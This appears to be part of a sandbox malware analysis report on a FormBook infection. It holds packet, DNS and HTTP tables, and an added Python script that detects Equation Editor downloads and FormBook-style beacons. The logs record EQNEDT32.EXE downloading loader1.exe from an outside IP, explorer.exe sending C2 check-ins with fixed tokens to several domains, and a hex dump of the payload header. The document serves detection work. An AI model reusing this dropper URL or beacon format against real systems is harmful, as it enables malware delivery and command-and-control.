Jul 22, 2021 17:23:20.209196091 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.212716103 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408178091 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408262014 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408409119 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408535957 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408560991 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408562899 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408565044 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408644915 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408644915 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408714056 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408719063 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408781052 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408782005 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408849955 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408849955 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408914089 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408922911 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.408987045 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.408988953 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.409060001 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.411926031 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.411957026 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.411983967 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.412003994 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.412020922 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.412087917 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.412102938 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.607979059 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608028889 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608061075 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608087063 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608113050 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608139992 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608165979 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608197927 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608201027 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608242989 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608251095 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608289003 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608289003 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608326912 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608340025 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608365059 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608371019 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608405113 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608407974 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608443022 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608447075 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608480930 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608484030 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608519077 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608520031 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608553886 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608553886 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608589888 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608593941 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608624935 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608634949 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608659029 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608675957 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.608705044 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.608738899 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.610814095 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.610846996 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.610872984 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.610899925 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.610925913 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.610951900 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.610979080 CEST | 80 | 49167 | 192.210.173.40 | 192.168.2.22
Jul 22, 2021 17:23:20.610996008 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
Jul 22, 2021 17:23:20.611018896 CEST | 49167 | 80 | 192.168.2.22 | 192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.611022949 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.611056089 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.611088037 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.612185955 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.809575081 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809622049 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809642076 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809663057 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809683084 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809709072 CEST8049167192.210.173.40192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:24:37.200670004 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:24:37.377166986 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:24:42.742911100 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:24:42.807352066 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:24:48.295579910 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:24:48.368793964 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:24:53.782813072 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:24:53.860035896 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:24:58.996340990 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:24:59.053472042 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:25:04.170917988 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:25:04.237020969 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:24:37.200670004 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.anthonysavillemiddleschool.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:42.742911100 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.envisionfordheights.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:48.295579910 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.melodezu.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:53.782813072 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.scuolatua.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:58.996340990 CEST | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.theshapecreator.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:25:04.170917988 CEST | 192.168.2.22 | 8.8.8.8 | 0xf09a | Standard query (0) | www.sprinkleresources.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 173.255.194.134 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 72.14.178.174 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 45.33.18.44 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 45.33.30.197 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 72.14.185.43 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 96.126.123.244 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 45.33.2.79 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 45.33.20.235 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 45.79.19.196 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 198.58.118.167 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 45.56.79.23 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:37.377166986 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.anthonysavillemiddleschool.com |  | 45.33.23.183 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:42.807352066 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.envisionfordheights.com | envisionfordheights.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:24:42.807352066 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | envisionfordheights.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:48.368793964 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.melodezu.com | melodezu.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:24:48.368793964 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | melodezu.com |  | 64.227.87.162 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:53.860035896 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.scuolatua.com |  | 62.149.128.40 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:24:59.053472042 CEST | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.theshapecreator.com |  | 217.160.0.194 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:25:04.237020969 CEST | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | www.sprinkleresources.com | sprinkleresources.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:25:04.237020969 CEST | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | sprinkleresources.com |  | 78.47.57.7 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 192.210.173.40
• www.anthonysavillemiddleschool.com
• www.envisionfordheights.com
• www.melodezu.com
• www.scuolatua.com
• www.theshapecreator.com
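
The two behaviours this capture records, EQNEDT32.EXE fetching loader1.exe over plain HTTP and explorer.exe walking through unrelated hosts with the same /dy8g/ path and the same m4= value (only f6AxB= changes, and the parameter order is swapped between the two requests), translate directly into detection logic. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not FormBook code. It replays constructed request records modelled on the sessions in the HTTP Packets table that follows, plus one hypothetical benign browser request that must not fire, and flags both patterns. The process image set and the min_hosts threshold are assumptions to tune per environment. One caveat for triage: FormBook carries a list of domains of which most are decoys and only one is the live C2, so the 200 from www.anthonysavillemiddleschool.com (a generic JavaScript bot-check page) and the 301 from www.envisionfordheights.com say nothing about which host is real; the beacon shape, not the response, is the indicator.

```python
"""Two detections derived from the HTTP request lines in this report.

Rule 1: Equation Editor (EQNEDT32.EXE) sending any HTTP request. It has no
        legitimate reason to reach the network; a GET for an .exe from it is
        the CVE-2017-11882 / CVE-2018-0802 dropper pattern the Sigma hits name.
Rule 2: FormBook-style check-in: one process GETs the same path on several
        unrelated hosts, keeps one query parameter constant while another
        varies, and sends 'Connection: close'.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class HttpRequest:
    process: str            # image path of the sending process (sandbox "Process" column)
    host: str               # Host header
    method: str
    target: str             # request-target exactly as sent (path + query)
    headers: dict = field(default_factory=dict)

    @property
    def image(self) -> str:
        return self.process.rsplit("\\", 1)[-1].lower()

    @property
    def path(self) -> str:
        return urlsplit(self.target).path

    @property
    def params(self) -> dict:
        # Split by hand rather than parse_qsl: the base64 values contain '+'
        # and '=' and must be compared verbatim, not URL-decoded.
        query = urlsplit(self.target).query
        return dict(kv.partition("=")[::2] for kv in query.split("&") if kv)

    def header(self, name: str) -> str:
        return next((v for k, v in self.headers.items() if k.lower() == name.lower()), "")


# Constructed from the request lines of sessions 0-2 in the HTTP Packets table,
# plus one hypothetical benign browser request (not from the report).
OBSERVED = [
    HttpRequest(r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                "192.210.173.40", "GET", "/files/loader1.exe",
                {"Accept": "*/*", "Connection": "Keep-Alive"}),
    HttpRequest(r"C:\Windows\explorer.exe", "www.anthonysavillemiddleschool.com", "GET",
                "/dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg==",
                {"Connection": "close"}),
    HttpRequest(r"C:\Windows\explorer.exe", "www.envisionfordheights.com", "GET",
                "/dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL",
                {"Connection": "close"}),
    HttpRequest(r"C:\Program Files\Internet Explorer\iexplore.exe", "www.example.com", "GET",
                "/index.html?session=abc123", {"Connection": "close"}),   # benign, hypothetical
]

# Assumption: Office helper images that never need HTTP; extend for your estate.
OFFICE_HELPERS_NEVER_ONLINE = {"eqnedt32.exe"}


def equation_editor_http(requests):
    """Rule 1: every request whose sending image is an Office helper that never needs HTTP."""
    return [r for r in requests if r.image in OFFICE_HELPERS_NEVER_ONLINE]


def beacon_clusters(requests, min_hosts=2):
    """Rule 2: group 'Connection: close' GETs by (image, path) and report groups that
    span at least min_hosts distinct hosts and share a query parameter whose value
    never changes across the group (the fixed m4= token in this sample)."""
    groups = defaultdict(list)
    for r in requests:
        if r.method == "GET" and r.header("Connection").lower() == "close":
            groups[(r.image, r.path)].append(r)

    hits = []
    for (image, path), reqs in groups.items():
        hosts = sorted({r.host for r in reqs})
        if len(hosts) < min_hosts:
            continue
        param_sets = [r.params for r in reqs]
        shared_keys = set.intersection(*(set(p) for p in param_sets))
        constant = {k: param_sets[0][k] for k in shared_keys
                    if all(p[k] == param_sets[0][k] for p in param_sets)}
        if constant:
            hits.append({"process": image, "path": path, "hosts": hosts,
                         "constant_params": constant})
    return hits


if __name__ == "__main__":
    for r in equation_editor_http(OBSERVED):
        print(f"[rule1] {r.image} -> http://{r.host}{r.target}")
    for h in beacon_clusters(OBSERVED):
        print(f"[rule2] {h['process']} beacons to {len(h['hosts'])} hosts on {h['path']} "
              f"with constant {h['constant_params']}")
```

Rule 2 deliberately keys on the shape of the request rather than on the domains or the m4 value, since FormBook builds change both per campaign; feed it the full set of explorer.exe requests from the capture and the constant parameter and path fall out on their own.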

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 192.210.173.40 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:23:19.807858944 CEST | 0 | OUT | GET /files/loader1.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.210.173.40
Connection: Keep-Alive
Jul 22, 2021 17:23:20.009445906 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 15:23:19 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Thu, 22 Jul 2021 14:21:45 GMT
ETag: "2e1d9-5c7b701c11d26"
Accept-Ranges: bytes
Content-Length: 188889
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 05 02 7b 28 64 6c 28 28 64 6c 28 28 64 6c 28 c0 7b 67 28 29 64 6c 28 ab 78 62 28 20 64 6c 28 c0 7b 66 28 3f 64 6c 28 21 1c ff 28 23 64 6c 28 28 64 6d 28 16 64 6c 28 21 1c ef 28 29 64 6c 28 21 1c fd 28 29 64 6c 28 52 69 63 68 28 64 6c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f0 7e f9 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 00 00 00 12 00 00 00 00 00 00 5a 20 00 00 00 10 00 00 00 50 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 54 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 34 00 00 00 10 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 09 00 00 00 50 00 00 00 0a 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 06 00 00 00 60 00 00 00 04 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l{(dl((dl((dl({g()dl(xb( dl({f(?dl(!(#dl((dm(dl(!()dl(!()dl(Rich(dl(PEL~`6Z P@p0TxP.text46 `.rdatadP:@@.data`D@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 173.255.194.134 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:24:37.561999083 CEST | 199 | OUT | GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1
Host: www.anthonysavillemiddleschool.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:24:37.735676050 CEST | 200 | IN | HTTP/1.1 200 OK
server: openresty/1.13.6.1
date: Thu, 22 Jul 2021 15:24:37 GMT
content-type: text/html; charset=utf-8
content-length: 1946
vary: Accept-Language
content-language: en
connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 76 61 72 20 70 20 3d 20 22 2e 65 4a 77 4e 7a 62 73 4f 67 6a 41 41 51 4e 46 5f 36 65 42 6b 77 49 41 57 59 73 49 41 50 6b 41 67 4d 57 68 38 78 4d 56 55 4b 42 51 73 46 4d 71 6a 6f 50 48 66 37 58 69 47 6d 5f 73 46 50 63 5f 42 47 71 6a 4a 5a 47 59 71 6d 41 50 45 73 31 61 36 58 46 6f 2d 65 64 63 4e 75 64 63 75 74 4d 4e 5a 43 75 33 52 73 62 6a 49 66 49 37 32 6e 30 65 74 58 72 58 47 37 4c 55 7a 4b 65 42 4a 33 36 79 4d 57 7a 54 56 48 38 5f 77 30 4b 47 77 74 32 46 51 70 46 56 48 38 4c 67 4c 4a 68 62 5a 33 55 56 41 54 58 63 58 7a 6e 48 51 58 66 48 4b 4c 45 74 2d 4f 45 34 78 78 31 79 75 4a 41 68 72 75 32 65 46 53 69 77 70 68 46 43 51 72 46 6b 31 74 57 6a 49 4b 63 56 6c 6e 69 51 55 74 7a 46 68 6a 43 6f 78 4b 38 48 76 44 5f 61 43 50 52 6f 3a 31 6d 36 61 59 76 3a 69 76 2d 55 48 39 71 39 6b 33 4c 50 35 4f 70 43 7a 55 6c 32 77 52 54 34 32 6a 67 22 2c 20 61 73 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 73 61 76 69 6c 6c 65 6d 69 64 64 6c 65 73 63 68 6f 6f 6c 2e 63 6f 6d 2f 6d 74 6d 2f 61 73 79 6e 63 2f 22 3b 66 75 6e 63 74 69 6f 6e 20 64 28 6e 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 34 32 2e 61 6e 74 68 6f 6e 79 73 61 76 69 6c 6c 65 6d 69 64 64 6c 65 73 63 68 6f 6f 6c 2e 63 6f 6d 2f 22 2b 6e 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 72 29 20 7b 69 66 20 28 72 2e 73 6c 69 63 65 28 30 2c 20 31 29 20 21 3d 3d 20 22 2e 22 29 20 
